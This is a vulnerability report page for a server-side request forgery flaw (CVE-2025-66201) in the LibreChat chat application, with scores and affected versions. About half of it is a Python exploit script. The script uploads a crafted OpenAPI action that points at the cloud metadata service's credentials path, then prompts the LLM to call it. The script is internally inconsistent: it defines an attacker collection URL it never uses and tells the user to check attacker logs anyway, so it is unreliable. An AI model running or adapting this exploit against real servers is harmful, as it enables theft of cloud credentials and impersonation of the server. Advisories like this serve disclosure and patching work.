Security Vulnerability Report
CVE-2025-66201 CVSS 8.1 HIGH

CVE-2025-66201

Published: 2025-11-29 02:15:52
Last Modified: 2025-12-03 21:49:39

Description

LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.1-rc2, LibreChat is vulnerable to Server-side Request Forgery (SSRF), by passing specially crafted OpenAPI specs to its "Actions" feature and making the LLM use those actions. It could be used by an authenticated user with access to this feature to access URLs only accessible to the LibreChat server (such as cloud metadata services, through which impersonation of the server might be possible). This issue has been patched in version 0.8.1-rc2.

CVSS Details

CVSS Score (v3.1, Primary)
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CVSS Score (v4.0, Secondary)
8.6 HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Weaknesses
CWE-918 (Server-Side Request Forgery), CWE-20 (Improper Input Validation)

Configurations (Affected Products)

cpe:2.3:a:librechat:librechat:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:* - VULNERABLE
LibreChat < 0.8.1-rc2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-66201 LibreChat SSRF PoC
# Target: LibreChat server with Actions feature enabled
TARGET_URL = "http://target-librechat-server.com"
ATTACKER_CONTROLLED_URL = "http://attacker-server.com/collect"
METADATA_URL = "http://169.254.169.254/latest/meta-data/"


def create_malicious_openapi_spec():
    """Generate malicious OpenAPI spec for SSRF attack"""
    return {
        "openapi": "3.0.0",
        "info": {"title": "Malicious Action", "version": "1.0.0"},
        "servers": [
            {"url": METADATA_URL, "description": "Internal metadata service"}
        ],
        "paths": {
            "/iam/security-credentials": {
                "get": {
                    "operationId": "getCredentials",
                    "summary": "Get cloud credentials",
                    "responses": {"200": {"description": "Successful response"}},
                }
            }
        },
    }


def exploit():
    """Execute SSRF attack via Actions feature"""
    # Step 1: Authenticate and get session token
    session = requests.Session()
    login_data = {"email": "[email protected]", "password": "password123"}
    session.post(f"{TARGET_URL}/api/auth/login", json=login_data)

    # Step 2: Upload malicious OpenAPI spec via Actions
    malicious_spec = create_malicious_openapi_spec()
    headers = {"Content-Type": "application/json"}
    response = session.post(
        f"{TARGET_URL}/api/actions/create",
        json={"spec": json.dumps(malicious_spec)},
        headers=headers,
    )

    # Step 3: Trigger the action via prompt
    prompt = "Get my cloud credentials"
    session.post(
        f"{TARGET_URL}/api/chat",
        json={"message": prompt, "actionId": response.json().get("id")},
    )
    print("SSRF payload sent. Check attacker server logs.")


if __name__ == "__main__":
    exploit()

References

https://github.com/danny-avila/LibreChat/security/advisories/GHSA-7m2q-fjwr-5x8v (Exploit, Vendor Advisory)
